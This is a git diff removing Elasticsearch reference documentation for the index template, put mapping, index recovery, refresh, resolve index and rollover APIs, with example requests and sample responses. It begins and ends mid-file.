-`data_stream: { }`. -+ -Data streams require a matching index template with a `data_stream` object. -See <>. - -`template`:: -(Optional, object) -Template to be applied. It may optionally include an `aliases`, `mappings`, or -`settings` configuration. -+ -.Properties of `template` -[%collapsible%open] -==== -include::{docdir}/rest-api/common-parms.asciidoc[tag=aliases] -+ -NOTE: You cannot add data streams to an index alias. - -include::{docdir}/rest-api/common-parms.asciidoc[tag=mappings] - -include::{docdir}/rest-api/common-parms.asciidoc[tag=settings] -==== - -`composed_of`:: -(Optional, array of strings) -An ordered list of component template names. Component templates are merged in the order -specified, meaning that the last component template specified has the highest precedence. See -<> for an example. - -`priority`:: -(Optional, integer) -Priority to determine index template precedence when a new data stream or index is created. The index template with -the highest priority is chosen. If no priority is specified the template is treated as though it is -of priority 0 (lowest priority). -This number is not automatically generated by {es}. - -`version`:: -(Optional, integer) -Version number used to manage index templates externally. -This number is not automatically generated by {es}. - -`_meta`:: -(Optional, object) -Optional user metadata about the index template. May have any contents. -This map is not automatically generated by {es}. - -[[put-index-template-api-example]] -==== {api-examples-title} - -===== Index template with index aliases - -You can include <> in an index template. - -[source,console] --------------------------------------------------- -PUT _index_template/template_1 -{ - "index_patterns" : ["te*"], - "template": { - "settings" : { - "number_of_shards" : 1 - }, - "aliases" : { - "alias1" : {}, - "alias2" : { - "filter" : { - "term" : {"user.id" : "kimchy" } - }, - "routing" : "shard-1" - }, - "{index}-alias" : {} <1> - } - } -} --------------------------------------------------- -<1> the `{index}` placeholder in the alias name will be replaced with the -actual index name that the template gets applied to, during index creation. - - -[[multiple-templates]] -===== Multiple matching templates - -If multiple index templates match the name of a new index or data stream, -the template with the highest priority is used. For example: - -[source,console] --------------------------------------------------- -PUT /_index_template/template_1 -{ - "index_patterns" : ["t*"], - "priority" : 0, - "template": { - "settings" : { - "number_of_shards" : 1, - "number_of_replicas": 0 - }, - "mappings" : { - "_source" : { "enabled" : false } - } - } -} - -PUT /_index_template/template_2 -{ - "index_patterns" : ["te*"], - "priority" : 1, - "template": { - "settings" : { - "number_of_shards" : 2 - }, - "mappings" : { - "_source" : { "enabled" : true } - } - } -} --------------------------------------------------- - -For indices that start with `te*`, `_source` will enabled, and the index will have two primary -shards and one replica, because only `template_2` will be applied. - -NOTE: Multiple templates with overlapping index patterns at the same priority are not allowed, and -an error will be thrown when attempting to create a template matching an existing index template at -identical priorities. - - -[[versioning-templates]] -===== Template versioning - -You can use the `version` parameter to add a version number to an index template. -External systems can use these version numbers to simplify template management. - -The `version` parameter is optional and not automatically generated or used by {es}. - -To unset a `version`, replace the template without specifying one. - -[source,console] --------------------------------------------------- -PUT /_index_template/template_1 -{ - "index_patterns" : ["foo", "bar"], - "priority" : 0, - "template": { - "settings" : { - "number_of_shards" : 1 - } - }, - "version": 123 -} --------------------------------------------------- - -To check the `version`, you can use the <> API. - -[[template-metadata]] -===== Template metadata - -You can use the `_meta` parameter to add arbitrary metadata to an index template. -This user-defined object is stored in the cluster state, -so keeping it short is preferrable. - -The `_meta` parameter is optional and not automatically generated or used by {es}. - -To unset `_meta`, replace the template without specifying one. - -[source,console] --------------------------------------------------- -PUT /_index_template/template_1 -{ - "index_patterns": ["foo", "bar"], - "template": { - "settings" : { - "number_of_shards" : 3 - } - }, - "_meta": { - "description": "set number of shards to three", - "serialization": { - "class": "MyIndexTemplate", - "id": 17 - } - } -} --------------------------------------------------- - -To check the `_meta`, you can use the <> API. - -[[data-stream-definition]] -===== Data stream definition - -To use an index template for a data stream, the template must include an empty `data_stream` object. -Data stream templates are only used for a stream's backing indices, -they are not applied to regular indices. -See <>. - -[source,console] --------------------------------------------------- -PUT /_index_template/template_1 -{ - "index_patterns": ["logs-*"], - "data_stream": { } -} --------------------------------------------------- - -[[multiple-component-templates]] -===== Composing aliases, mappings, and settings - -When multiple component templates are specified in the `composed_of` field for an index template, -they are merged in the order specified, meaning that later component templates override earlier -component templates. Any mappings, settings, or aliases from the parent index template are merged -in next. Finally, any configuration on the index request itself is merged. - -In this example, the order of the two component templates changes the number of shards for an -index: - -[source,console] --------------------------------------------------- -PUT /_component_template/template_with_2_shards -{ - "template": { - "settings": { - "index.number_of_shards": 2 - } - } -} - -PUT /_component_template/template_with_3_shards -{ - "template": { - "settings": { - "index.number_of_shards": 3 - } - } -} - -PUT /_index_template/template_1 -{ - "index_patterns": ["t*"], - "composed_of": ["template_with_2_shards", "template_with_3_shards"] -} --------------------------------------------------- - -In this case, an index matching `t*` will have three primary shards. If the order of composed -templates were reversed, the index would have two primary shards. - -Mapping definitions are merged recursively, which means that later mapping components can -introduce new field mappings and update the mapping configuration. If a field mapping is -already contained in an earlier component, its definition will be completely overwritten -by the later one. - -This recursive merging strategy applies not only to field mappings, but also root options like -`dynamic_templates` and `meta`. If an earlier component contains a `dynamic_templates` block, -then by default new `dynamic_templates` entries are appended onto the end. If an entry already -exists with the same key, then it is overwritten by the new definition. diff --git a/docs/reference/indices/put-mapping.asciidoc b/docs/reference/indices/put-mapping.asciidoc deleted file mode 100644 index 002183ad7bd..00000000000 --- a/docs/reference/indices/put-mapping.asciidoc +++ /dev/null @@ -1,431 +0,0 @@ -[[indices-put-mapping]] -=== Put mapping API -++++ -Put mapping -++++ - -Adds new fields to an existing data stream or index. You can also use the -put mapping API to change the search settings of existing fields. - -For data streams, these changes are applied to all backing indices by default. - -[source,console] ----- -PUT /my-index-000001/_mapping -{ - "properties": { - "email": { - "type": "keyword" - } - } -} ----- -// TEST[setup:my_index] - -NOTE: Before 7.0.0, the 'mappings' definition used to include a type name. -Although specifying types in requests is now deprecated, a type can still be -provided if the request parameter `include_type_name` is set. For more details, -please see <>. - - -[[put-mapping-api-request]] -==== {api-request-title} - -`PUT //_mapping` - -`PUT /_mapping` - - -[[put-mapping-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - - -[[put-mapping-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-type-name] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -`write_index_only`:: -(Optional, Boolean) -If `true`, -the mappings are applied only to the current write index for the target. -Defaults to `false`. - - -[[put-mapping-api-request-body]] -==== {api-request-body-title} - -`properties`:: -+ --- -(Required, <>) Mapping for a field. For new -fields, this mapping can include: - -* Field name -* <> -* <> - -For existing fields, see <>. --- - - -[[put-mapping-api-example]] -==== {api-examples-title} - -[[put-field-mapping-api-basic-ex]] -===== Example with single target - -The put mapping API requires an existing data stream or index. The following -<> API request creates the `publications` -index with no mapping. - -[source,console] ----- -PUT /publications ----- - -The following put mapping API request adds `title`, a new <> field, -to the `publications` index. - -[source,console] ----- -PUT /publications/_mapping -{ - "properties": { - "title": { "type": "text"} - } -} ----- -// TEST[continued] - -[[put-mapping-api-multi-ex]] -===== Multiple targets - -The PUT mapping API can be applied to multiple data streams or indices with a single request. -For example, you can update mappings for the `my-index-000001` and `my-index-000002` indices at the same time: - -[source,console] --------------------------------------------------- -# Create the two indices -PUT /my-index-000001 -PUT /my-index-000002 - -# Update both mappings -PUT /my-index-000001,my-index-000002/_mapping -{ - "properties": { - "user": { - "properties": { - "name": { - "type": "keyword" - } - } - } - } -} --------------------------------------------------- - - -[[add-new-field-to-object]] -===== Add new properties to an existing object field - -You can use the put mapping API to add new properties to an existing -<> field. To see how this works, try the following example. - -Use the <> API to create an index with the -`name` object field and an inner `first` text field. - -[source,console] ----- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "name": { - "properties": { - "first": { - "type": "text" - } - } - } - } - } -} ----- - -Use the put mapping API to add a new inner `last` text field to the `name` -field. - -[source,console] ----- -PUT /my-index-000001/_mapping -{ - "properties": { - "name": { - "properties": { - "last": { - "type": "text" - } - } - } - } -} ----- -// TEST[continued] - - -[[add-multi-fields-existing-field-ex]] -===== Add multi-fields to an existing field - -<> let you index the same field in different ways. -You can use the put mapping API to update the `fields` mapping parameter and -enable multi-fields for an existing field. - -To see how this works, try the following example. - -Use the <> API to create an index with the -`city` <> field. - -[source,console] ----- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "city": { - "type": "text" - } - } - } -} ----- - -While text fields work well for full-text search, <> fields are -not analyzed and may work better for sorting or aggregations. - -Use the put mapping API to enable a multi-field for the `city` field. This -request adds the `city.raw` keyword multi-field, which can be used for sorting. - -[source,console] ----- -PUT /my-index-000001/_mapping -{ - "properties": { - "city": { - "type": "text", - "fields": { - "raw": { - "type": "keyword" - } - } - } - } -} ----- -// TEST[continued] - - -[[change-existing-mapping-parms]] -===== Change supported mapping parameters for an existing field - -The documentation for each <> indicates -whether you can update it for an existing field using the put mapping API. For -example, you can use the put mapping API to update the -<> parameter. - -To see how this works, try the following example. - -Use the <> API to create an index containing -a `user_id` keyword field. The `user_id` field has an `ignore_above` parameter -value of `20`. - -[source,console] ----- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "user_id": { - "type": "keyword", - "ignore_above": 20 - } - } - } -} ----- - -Use the put mapping API to change the `ignore_above` parameter value to `100`. - -[source,console] ----- -PUT /my-index-000001/_mapping -{ - "properties": { - "user_id": { - "type": "keyword", - "ignore_above": 100 - } - } -} ----- -// TEST[continued] - - -[[updating-field-mappings]] -===== Change the mapping of an existing field - -// tag::change-field-mapping[] -Except for supported <>, -you can't change the mapping or field type of an existing field. -Changing an existing field could invalidate data that's already indexed. - -If you need to change the mapping of a field in a data stream's backing indices, -see <>. - -If you need to change the mapping of a field in other indices, -create a new index with the correct mapping -and <> your data into that index. -// end::change-field-mapping[] - -To see how you can change the mapping of an existing field in an index, -try the following example. - -Use the <> API -to create an index -with the `user_id` field -with the <> field type. - -[source,console] ----- -PUT /my-index-000001 -{ - "mappings" : { - "properties": { - "user_id": { - "type": "long" - } - } - } -} ----- - -Use the <> API -to index several documents -with `user_id` field values. - -[source,console] ----- -POST /my-index-000001/_doc?refresh=wait_for -{ - "user_id" : 12345 -} - -POST /my-index-000001/_doc?refresh=wait_for -{ - "user_id" : 12346 -} ----- -// TEST[continued] - -To change the `user_id` field -to the <> field type, -use the create index API -to create a new index with the correct mapping. - -[source,console] ----- -PUT /my-new-index-000001 -{ - "mappings" : { - "properties": { - "user_id": { - "type": "keyword" - } - } - } -} ----- -// TEST[continued] - -Use the <> API -to copy documents from the old index -to the new one. - -[source,console] ----- -POST /_reindex -{ - "source": { - "index": "my-index-000001" - }, - "dest": { - "index": "my-new-index-000001" - } -} ----- -// TEST[continued] - - -[[rename-existing-field]] -===== Rename a field - -// tag::rename-field[] -Renaming a field would invalidate data already indexed under the old field name. -Instead, add an <> field to create an alternate field name. -// end::rename-field[] - -For example, -use the <> API -to create an index -with the `user_identifier` field. - -[source,console] ----- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "user_identifier": { - "type": "keyword" - } - } - } -} ----- - -Use the put mapping API to add the `user_id` field alias -for the existing `user_identifier` field. - -[source,console] ----- -PUT /my-index-000001/_mapping -{ - "properties": { - "user_id": { - "type": "alias", - "path": "user_identifier" - } - } -} ----- -// TEST[continued] diff --git a/docs/reference/indices/recovery.asciidoc b/docs/reference/indices/recovery.asciidoc deleted file mode 100644 index d33ff98d640..00000000000 --- a/docs/reference/indices/recovery.asciidoc +++ /dev/null @@ -1,451 +0,0 @@ -[[indices-recovery]] -=== Index recovery API -++++ -Index recovery -++++ - - -Returns information about ongoing and completed shard recoveries for one or more -indices. For data streams, the API returns information for the stream's backing -indices. - -[source,console] ----- -GET /my-index-000001/_recovery ----- -// TEST[setup:my_index] - - -[[index-recovery-api-request]] -==== {api-request-title} - -`GET //_recovery` - -`GET /_recovery` - - -[[index-recovery-api-desc]] -==== {api-description-title} - -Use the index recovery API -to get information about ongoing and completed shard recoveries. - -// tag::shard-recovery-desc[] -Shard recovery is the process -of syncing a replica shard from a primary shard. -Upon completion, -the replica shard is available for search. - -include::{es-repo-dir}/glossary.asciidoc[tag=recovery-triggers] - -// end::shard-recovery-desc[] - -[[index-recovery-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - - -[[index-recovery-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=active-only] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=detailed] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-query-parm] - - -[[index-recovery-api-response-body]] -==== {api-response-body-title} - -`id`:: -(Integer) -ID of the shard. - -`type`:: -+ --- -(String) -Recovery type. -Returned values include: - -`STORE`:: -The recovery is related to -a node startup or failure. -This type of recovery is called a local store recovery. - -`SNAPSHOT`:: -The recovery is related to -a <>. - -`REPLICA`:: -The recovery is related to -a <>. - -`RELOCATING`:: -The recovery is related to -the relocation of a shard -to a different node in the same cluster. --- - -`STAGE`:: -+ --- -(String) -Recovery stage. -Returned values include: - -`DONE`:: -Complete. - -`FINALIZE`:: -Cleanup. - -`INDEX`:: -Reading index metadata and copying bytes from source to destination. - -`INIT`:: -Recovery has not started. - -`START`:: -Starting the recovery process; opening the index for use. - -`TRANSLOG`:: -Replaying transaction log . --- - -`primary`:: -(Boolean) -If `true`, -the shard is a primary shard. - -`start_time`:: -(String) -Timestamp of recovery start. - -`stop_time`:: -(String) -Timestamp of recovery finish. - -`total_time_in_millis`:: -(String) -Total time to recover shard in milliseconds. - -`source`:: -+ --- -(Object) -Recovery source. -This can include: - - * A repository description if recovery is from a snapshot - * A description of source node --- - -`target`:: -(Object) -Destination node. - -`index`:: -(Object) -Statistics about physical index recovery. - -`translog`:: -(Object) -Statistics about translog recovery. - -`start`:: -(Object) -Statistics about time to open and start the index. - - -[[index-recovery-api-example]] -==== {api-examples-title} - - -[[index-recovery-api-multi-ex]] -===== Get recovery information for several data streams and indices - -[source,console] --------------------------------------------------- -GET index1,index2/_recovery?human --------------------------------------------------- -// TEST[s/^/PUT index1\nPUT index2\n/] - - -[[index-recovery-api-all-ex]] -===== Get segment information for all data streams and indices in a cluster - -////////////////////////// -Here we create a repository and snapshot index1 in -order to restore it right after and prints out the -index recovery result. - -[source,console] --------------------------------------------------- -# create the index -PUT index1 -{"settings": {"index.number_of_shards": 1}} - -# create the repository -PUT /_snapshot/my_repository -{"type": "fs","settings": {"location": "recovery_asciidoc" }} - -# snapshot the index -PUT /_snapshot/my_repository/snap_1?wait_for_completion=true -{"indices": "index1"} - -# delete the index -DELETE index1 - -# and restore the snapshot -POST /_snapshot/my_repository/snap_1/_restore?wait_for_completion=true - --------------------------------------------------- - -[source,console-result] --------------------------------------------------- -{ - "snapshot": { - "snapshot": "snap_1", - "indices": [ - "index1" - ], - "shards": { - "total": 1, - "failed": 0, - "successful": 1 - } - } -} --------------------------------------------------- -////////////////////////// - -[source,console] --------------------------------------------------- -GET /_recovery?human --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "index1" : { - "shards" : [ { - "id" : 0, - "type" : "SNAPSHOT", - "stage" : "INDEX", - "primary" : true, - "start_time" : "2014-02-24T12:15:59.716", - "start_time_in_millis": 1393244159716, - "stop_time" : "0s", - "stop_time_in_millis" : 0, - "total_time" : "2.9m", - "total_time_in_millis" : 175576, - "source" : { - "repository" : "my_repository", - "snapshot" : "my_snapshot", - "index" : "index1", - "version" : "{version}", - "restoreUUID": "PDh1ZAOaRbiGIVtCvZOMww" - }, - "target" : { - "id" : "ryqJ5lO5S4-lSFbGntkEkg", - "host" : "my.fqdn", - "transport_address" : "my.fqdn", - "ip" : "10.0.1.7", - "name" : "my_es_node" - }, - "index" : { - "size" : { - "total" : "75.4mb", - "total_in_bytes" : 79063092, - "reused" : "0b", - "reused_in_bytes" : 0, - "recovered" : "65.7mb", - "recovered_in_bytes" : 68891939, - "percent" : "87.1%" - }, - "files" : { - "total" : 73, - "reused" : 0, - "recovered" : 69, - "percent" : "94.5%" - }, - "total_time" : "0s", - "total_time_in_millis" : 0, - "source_throttle_time" : "0s", - "source_throttle_time_in_millis" : 0, - "target_throttle_time" : "0s", - "target_throttle_time_in_millis" : 0 - }, - "translog" : { - "recovered" : 0, - "total" : 0, - "percent" : "100.0%", - "total_on_start" : 0, - "total_time" : "0s", - "total_time_in_millis" : 0, - }, - "verify_index" : { - "check_index_time" : "0s", - "check_index_time_in_millis" : 0, - "total_time" : "0s", - "total_time_in_millis" : 0 - } - } ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/: (\-)?[0-9]+/: $body.$_path/] -// TESTRESPONSE[s/: "[^"]*"/: $body.$_path/] -//// -The TESTRESPONSE above replace all the fields values by the expected ones in the test, -because we don't really care about the field values but we want to check the fields names. -//// - -This response includes information -about a single index recovering a single shard. -The source of the recovery is a snapshot repository -and the target of the recovery is the `my_es_node` node. - -The response also includes the number -and percentage of files and bytes recovered. - - -[[index-recovery-api-detailed-ex]] -===== Get detailed recovery information - -To get a list of physical files in recovery, -set the `detailed` query parameter to `true`. - -[source,console] --------------------------------------------------- -GET _recovery?human&detailed=true --------------------------------------------------- -// TEST[s/^/PUT index1\n{"settings": {"index.number_of_shards": 1}}\n/] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "index1" : { - "shards" : [ { - "id" : 0, - "type" : "STORE", - "stage" : "DONE", - "primary" : true, - "start_time" : "2014-02-24T12:38:06.349", - "start_time_in_millis" : "1393245486349", - "stop_time" : "2014-02-24T12:38:08.464", - "stop_time_in_millis" : "1393245488464", - "total_time" : "2.1s", - "total_time_in_millis" : 2115, - "source" : { - "id" : "RGMdRc-yQWWKIBM4DGvwqQ", - "host" : "my.fqdn", - "transport_address" : "my.fqdn", - "ip" : "10.0.1.7", - "name" : "my_es_node" - }, - "target" : { - "id" : "RGMdRc-yQWWKIBM4DGvwqQ", - "host" : "my.fqdn", - "transport_address" : "my.fqdn", - "ip" : "10.0.1.7", - "name" : "my_es_node" - }, - "index" : { - "size" : { - "total" : "24.7mb", - "total_in_bytes" : 26001617, - "reused" : "24.7mb", - "reused_in_bytes" : 26001617, - "recovered" : "0b", - "recovered_in_bytes" : 0, - "percent" : "100.0%" - }, - "files" : { - "total" : 26, - "reused" : 26, - "recovered" : 0, - "percent" : "100.0%", - "details" : [ { - "name" : "segments.gen", - "length" : 20, - "recovered" : 20 - }, { - "name" : "_0.cfs", - "length" : 135306, - "recovered" : 135306 - }, { - "name" : "segments_2", - "length" : 251, - "recovered" : 251 - } - ] - }, - "total_time" : "2ms", - "total_time_in_millis" : 2, - "source_throttle_time" : "0s", - "source_throttle_time_in_millis" : 0, - "target_throttle_time" : "0s", - "target_throttle_time_in_millis" : 0 - }, - "translog" : { - "recovered" : 71, - "total" : 0, - "percent" : "100.0%", - "total_on_start" : 0, - "total_time" : "2.0s", - "total_time_in_millis" : 2025 - }, - "verify_index" : { - "check_index_time" : 0, - "check_index_time_in_millis" : 0, - "total_time" : "88ms", - "total_time_in_millis" : 88 - } - } ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"source" : \{[^}]*\}/"source" : $body.$_path/] -// TESTRESPONSE[s/"details" : \[[^\]]*\]/"details" : $body.$_path/] -// TESTRESPONSE[s/: (\-)?[0-9]+/: $body.$_path/] -// TESTRESPONSE[s/: "[^"]*"/: $body.$_path/] -//// -The TESTRESPONSE above replace all the fields values by the expected ones in the test, -because we don't really care about the field values but we want to check the fields names. -It also removes the "details" part which is important in this doc but really hard to test. -//// - -The response includes a listing -of any physical files recovered -and their sizes. - -The response also includes timings in milliseconds -of the various stages of recovery: - -* Index retrieval -* Translog replay -* Index start time - -This response indicates the recovery is `done`. -All recoveries, -whether ongoing or complete, -are kept in the cluster state -and may be reported on at any time. - -To only return information about ongoing recoveries, -set the `active_only` query parameter to `true`. diff --git a/docs/reference/indices/refresh.asciidoc b/docs/reference/indices/refresh.asciidoc deleted file mode 100644 index 98fbd5268ae..00000000000 --- a/docs/reference/indices/refresh.asciidoc +++ /dev/null @@ -1,110 +0,0 @@ -[[indices-refresh]] -=== Refresh API -++++ -Refresh -++++ - -Refreshes one or more indices. For data streams, the API refreshes the stream's -backing indices. - -[source,console] ----- -POST /my-index-000001/_refresh ----- -// TEST[setup:my_index] - - -[[refresh-api-request]] -==== {api-request-title} - -`POST /_refresh` - -`GET /_refresh` - -`POST /_refresh` - -`GET /_refresh` - - -[[refresh-api-desc]] -==== {api-description-title} - -Use the refresh API to explicitly refresh one or more indices. -If the request targets a data stream, it refreshes the stream's backing indices. -A _refresh_ makes all operations performed on an index -since the last refresh -available for search. - -// tag::refresh-interval-default[] -By default, Elasticsearch periodically refreshes indices every second, but only on -indices that have received one search request or more in the last 30 seconds. -// end::refresh-interval-default[] -You can change this default interval -using the <> setting. - -Refresh requests are synchronous and do not return a response until the -refresh operation completes. - -[IMPORTANT] -==== -Refreshes are resource-intensive. -To ensure good cluster performance, -we recommend waiting for {es}'s periodic refresh -rather than performing an explicit refresh -when possible. - -If your application workflow -indexes documents and then runs a search -to retrieve the indexed document, -we recommend using the <>'s -`refresh=wait_for` query parameter option. -This option ensures the indexing operation waits -for a periodic refresh -before running the search. -==== - -[[refresh-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index] -+ -To refresh all indices in the cluster, -omit this parameter -or use a value of `_all` or `*`. - - -[[refresh-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - - -[[refresh-api-example]] -==== {api-examples-title} - - -[[refresh-api-multiple-ex]] -===== Refresh several data streams and indices - -[source,console] ----- -POST /my-index-000001,my-index-000002/_refresh ----- -// TEST[s/^/PUT my-index-000001\nPUT my-index-000002\n/] - - -[[refresh-api-all-ex]] -===== Refresh all data streams and indices in a cluster - -[source,console] ----- -POST /_refresh ----- diff --git a/docs/reference/indices/resolve.asciidoc b/docs/reference/indices/resolve.asciidoc deleted file mode 100644 index 3f0a5978f11..00000000000 --- a/docs/reference/indices/resolve.asciidoc +++ /dev/null @@ -1,141 +0,0 @@ -[[indices-resolve-index-api]] -=== Resolve index API -++++ -Resolve index -++++ - -Resolves the specified name(s) and/or index patterns for indices, index -aliases, and data streams. Multiple patterns and remote clusters are -supported. - -//// -[source,console] ----- -PUT /foo_closed - -POST /foo_closed/_close - -PUT /remotecluster-bar-01 - -PUT /freeze-index - -POST /freeze-index/_freeze - -PUT /my-index-000001 - -PUT /freeze-index/_alias/f-alias - -PUT /my-index-000001/_alias/f-alias - -PUT /_index_template/foo_data_stream -{ - "index_patterns": [ "foo" ], - "data_stream": { } -} - -PUT /_data_stream/foo ----- -// TESTSETUP - -[source,console] ----- -DELETE /_data_stream/* - -DELETE /_index_template/foo_data_stream ----- -// TEARDOWN -//// - -[source,console] ----- -GET /_resolve/index/my-index-* ----- - -[[resolve-index-api-request]] -==== {api-request-title} - -`GET /_resolve/index/` - - -[[resolve-index-api-path-params]] -==== {api-path-parms-title} - -``:: -+ --- -(Required, string) Comma-separated name(s) or index pattern(s) of the -indices, index aliases, and data streams to resolve. Resources on -<> can be specified using the -`:` syntax. --- - -[[resolve-index-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -[[resolve-index-api-example]] -==== {api-examples-title} - -[source,console] ----- -GET /_resolve/index/f*,remoteCluster1:bar*?expand_wildcards=all ----- -// TEST[continued] -// TEST[s/remoteCluster1:/remotecluster-/] - -The API returns the following response: - -[source,console-result] ----- -{ - "indices": [ <1> - { - "name": "foo_closed", - "attributes": [ - "closed" - ] - }, - { - "name": "freeze-index", - "aliases": [ - "f-alias" - ], - "attributes": [ - "frozen", - "open" - ] - }, - { - "name": "remoteCluster1:bar-01", - "attributes": [ - "open" - ] - } - ], - "aliases": [ <2> - { - "name": "f-alias", - "indices": [ - "freeze-index", - "my-index-000001" - ] - } - ], - "data_streams": [ <3> - { - "name": "foo", - "backing_indices": [ - ".ds-foo-000001" - ], - "timestamp_field": "@timestamp" - } - ] -} ----- -// TESTRESPONSE[s/remoteCluster1:/remotecluster-/] -<1> All indices matching the supplied names or expressions -<2> All aliases matching the supplied names or expressions -<3> All data streams matching the supplied names or expressions diff --git a/docs/reference/indices/rollover-index.asciidoc b/docs/reference/indices/rollover-index.asciidoc deleted file mode 100644 index 55270a4f237..00000000000 --- a/docs/reference/indices/rollover-index.asciidoc +++ /dev/null @@ -1,549 +0,0 @@ -[[indices-rollover-index]] -=== Rollover index API -++++ -Rollover index -++++ - -Creates a new index for a rollover target when the target's existing index meets -a condition you provide. A rollover target can be either an -<> or a -<>. When targeting an alias, the alias -is updated to point to the new index. When targeting a data stream, the new -index becomes the data stream's write index and its generation is incremented. - -[source,console] ----- -POST /alias1/_rollover/my-index-000002 -{ - "conditions": { - "max_age": "7d", - "max_docs": 1000, - "max_size": "5gb" - } -} ----- -// TEST[s/^/PUT my_old_index_name\nPUT my_old_index_name\/_alias\/alias1\n/] - - -[[rollover-index-api-request]] -==== {api-request-title} - - -`POST //_rollover/` - -`POST //_rollover/` - - -[[rollover-index-api-desc]] -==== {api-description-title} - -The rollover index API rolls a rollover target to a new index when -the existing index meets a condition you provide. You can use this API to retire -an index that becomes too large or too old. - -NOTE: To roll over an index, a condition must be met *when you call the API*. -{es} does not monitor the index after you receive an API response. To -automatically roll over indices when a condition is met, you can use {es}'s -<>. - -The rollover index API accepts a rollover target name -and a list of `conditions`. - -If the specified rollover target is an alias pointing to a single index, -the rollover request: - -. Creates a new index -. Adds the alias to the new index -. Removes the alias from the original index - -If the specified rollover target is an alias pointing to multiple indices, -one of these indices must have `is_write_index` set to `true`. -In this case, the rollover request: - -. Creates a new index -. Sets `is_write_index` to `true` for the new index -. Sets `is_write_index` to `false` for the original index - -If the specified rollover target is a data stream, the rollover request: - -. Creates a new index -. Adds the new index as a backing index and the write index on the data stream -. Increments the `generation` attribute of the data stream - -[[rollover-wait-active-shards]] -===== Wait for active shards - -Because the rollover operation creates a new index to rollover to, the -<> setting on -index creation applies to the rollover action. - - -[[rollover-index-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required*, string) -Name of the existing index alias or data stream on which to -to assign to the target index. perform the rollover. - - -``:: -+ --- -(Optional*, string) -Name of the target index to create and assign the index alias. - -include::{es-repo-dir}/indices/create-index.asciidoc[tag=index-name-reqs] - -*This parameter is not permitted if `rollover-target` is a data stream. In -that case, the new index name will be in the form `.ds--000001` -where the zero-padded number of length 6 is the generation of the data stream. - -If `rollover-target` is an alias that is assigned to an index name that ends -with `-` and a number such as `logs-000001`. In this case, the name of the new -index follows the same pattern and increments the number. For example, -`logs-000001` increments to `logs-000002`. This number is zero-padded with a -length of 6, regardless of the prior index name. - -If the existing index for the alias does not match this pattern, this parameter -is required. - --- - - -[[rollover-index-api-query-params]] -==== {api-query-parms-title} - -`dry_run`:: -(Optional, Boolean) -If `true`, -the request checks whether the index matches provided conditions -but does not perform a rollover. -Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-type-name] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[rollover-index-api-request-body]] -==== {api-request-body-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=aliases] - -`conditions`:: -+ --- -(Optional, object) -If supplied, the set of conditions the rollover target's existing index must -meet to roll over. If omitted, the rollover will be performed unconditionally. - -Parameters include: - -`max_age`:: -(Optional, <>) -Maximum age of the index. - -`max_docs`:: -(Optional, integer) -Maximum number of documents in the index. -Documents added since the last refresh are not included in the document count. -The document count does *not* include documents in replica shards. - -`max_size`:: -(Optional, <>) -Maximum index size. -This is the total size of all primary shards in the index. -Replicas are not counted toward the maximum index size. - -TIP: To see the current index size, use the <> API. -The `pri.store.size` value shows the combined size of all primary shards. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=mappings] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=settings] - - -[[rollover-index-api-example]] -==== {api-examples-title} - -[[rollover-index-basic-ex]] -===== Basic example - -[source,console] --------------------------------------------------- -PUT /logs-000001 <1> -{ - "aliases": { - "logs_write": {} - } -} - -# Add > 1000 documents to logs-000001 - -POST /logs_write/_rollover <2> -{ - "conditions": { - "max_age": "7d", - "max_docs": 1000, - "max_size": "5gb" - } -} --------------------------------------------------- -// TEST[setup:my_index_huge] -// TEST[s/# Add > 1000 documents to logs-000001/POST _reindex?refresh\n{"source":{"index":"my-index-000001"},"dest":{"index":"logs-000001"}}/] -<1> Creates an index called `logs-0000001` with the alias `logs_write`. -<2> If the index pointed to by `logs_write` was created 7 or more days ago, or - contains 1,000 or more documents, or has an index size at least around 5GB, then the `logs-000002` index is created - and the `logs_write` alias is updated to point to `logs-000002`. - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged": true, - "shards_acknowledged": true, - 